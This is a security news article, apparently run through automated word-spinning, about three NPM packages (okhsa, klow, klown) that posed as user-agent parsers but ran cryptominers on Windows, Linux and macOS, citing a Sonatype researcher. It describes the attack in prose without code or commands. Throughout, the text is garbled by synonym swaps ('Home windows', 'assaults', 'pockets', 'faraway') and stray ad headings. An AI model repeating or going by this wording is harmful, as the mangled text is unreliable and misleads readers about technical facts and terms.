Malicious NPM Packages Caught Operating Cryptominer On Home windows, Linux, macOS Units


NPM Package

Three JavaScript libraries uploaded to the official NPM bundle repository have been unmasked as crypto-mining malware, as soon as once more demonstrating how open-source software program bundle repositories have gotten a profitable goal for executing an array of assaults on Home windows, macOS, and Linux programs.

The malicious packages in query — named okhsa, klow, and klown — had been revealed by the identical developer and falsely claimed to be JavaScript-based user-agent string parsers designed to extract {hardware} specifics from the “User-Agent” HTTP header. However unbeknownst to the victims who imported them, the creator hid cryptocurrency mining malware contained in the libraries.

Automatic GitHub Backups

The dangerous actor’s NPM account has since been deactivated, and all of the three libraries, every of which had been downloaded 112, 4, and 65 occasions respectively, have been faraway from the repository as of October 15, 2021.

Assaults involving the three libraries labored by detecting the present working system, earlier than continuing to run a .bat (for Home windows) or .sh (for Unix-based OS) script. “These scripts then obtain an externally-hosted EXE or a Linux ELF, and execute the binary with arguments specifying the mining pool to make use of, the pockets to mine cryptocurrency for, and the variety of CPU threads to make the most of,” Sonatype safety researcher Ali ElShakankiry said.

NPM Package

That is removed from the primary time brandjacking, typosquatting, and cryptomining malware have been discovered lurking in software program repositories.

Enterprise Password Management

Earlier this June, Sonatype, and JFrog (previously Vdoo) recognized malicious packages infiltrating the PyPI repository that secretly deployed crypto-miners on the affected machines. That is however copycat packages named after repositories or elements used internally by high-profile tech firms in what’s generally known as dependency confusion.





Source link